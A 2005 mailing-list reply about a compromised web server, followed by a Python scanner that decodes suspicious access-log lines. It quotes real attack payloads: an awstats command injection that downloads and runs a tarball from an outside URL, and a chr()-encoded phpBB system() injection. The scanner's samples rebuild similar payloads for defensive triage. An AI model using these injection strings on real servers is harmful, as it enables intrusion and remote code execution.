
Re: a compromised machine



On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:

> Since the process runs as "www-data" some kiddy has abused a web service
> on your server to download and run an external software. Look for
> suspicious log lines of your web server.

  Yes ..

> Examples of hacks on our servers:
> 
> 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET
> /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20
> HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1; SV1; FunWebProducts)"

> 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET
> /phpbb/viewto
> pic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech
> r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%
> 252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527
> HTTP/
> 1.0" 200 28732 "-" "PHP/4.3.4"
> 
> It should be rather easy finding signs of weird accesses like %20 or
> chr(). Also look for weird signs in /tmp.

Both of these attacks could be prevented by the use of mod_security,
which I'd recommend you look into using in the future if you have
potentially untrusted scripts running.

Steve
--
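Christoph's advice above (grep the web server logs for encoded payloads such as `%20` or `chr()`) can be turned into a small triage script. The following is an added example, not code from either poster: it parses Apache combined-format access log lines, URL-decodes the request target repeatedly so that double-encoded payloads like `%2527` collapse to the character they hide, flags request lines that carry shell-command or PHP-injection indicators, and expands `chr(n).chr(n)...` chains so the analyst can read what was attempted. The indicator list, the helper names and the sample log lines (using documentation IP addresses and the `example.invalid` host) are all constructed for this example.

```python
"""Triage scanner for web server access logs after a suspected www-data compromise.

Added example: looks for the kind of encoded command payloads quoted in the
thread (awstats configdir injection, phpBB highlight chr() injection) and
reports them in decoded form. Indicator list and sample lines are constructed.
"""
import re
import urllib.parse

# Apache/nginx "combined" log format; only the request target is analysed.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators checked against the *decoded* target. %20 alone is deliberately
# not an indicator: it is normal in search queries; the command shape is what
# distinguishes an attack.
INDICATORS = [
    ("shell pipe", re.compile(r"\|")),
    ("shell separator", re.compile(r";")),
    ("download tool", re.compile(r"\b(?:wget|curl|fetch)\b", re.I)),
    ("cd /tmp", re.compile(r"\bcd\s+/tmp\b")),
    ("php chr() obfuscation", re.compile(r"chr\(\d+\)", re.I)),
    ("php system() call",
     re.compile(r"\b(?:system|passthru|exec|shell_exec)\s*\(", re.I)),
]

# A chain like chr(108).chr(115).chr(32) concatenated by PHP's "." operator.
CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*", re.I)


def decode_target(target, max_rounds=3):
    """URL-decode until the string stops changing (handles %2527 -> %27 -> ')."""
    current = target
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def deobfuscate_chr(text):
    """Replace chr(n).chr(n)... chains with the literal string they build."""
    def repl(match):
        codes = re.findall(r"chr\((\d+)\)", match.group(0), re.I)
        return "".join(chr(int(c)) for c in codes if int(c) < 0x110000)
    return CHR_CHAIN.sub(repl, text)


def analyze_line(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    return {"host": m.group("host"), "time": m.group("time"),
            "target": decoded, "indicators": hits}


def scan(lines):
    """Return findings for every line that triggered at least one indicator."""
    findings = []
    for line in lines:
        result = analyze_line(line)
        if result and result["indicators"]:
            findings.append(result)
    return findings


# Constructed sample log: two benign requests and two modelled on the thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Feb/2005:19:58:01 +0100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2005:20:01:14 +0100] "GET /search.php?q=debian%20sarge%20release HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20http%3a%2f%2fexample.invalid%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0"',
    '198.51.100.77 - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']} [{f['time']}] {', '.join(f['indicators'])}")
        print("    decoded:", deobfuscate_chr(f["target"]))
```

Run against a real log with `scan(open("/var/log/apache2/access.log"))`; the decoded output tells you which script was abused and what the attacker tried to fetch, which is what you need before checking `/tmp` and the process list.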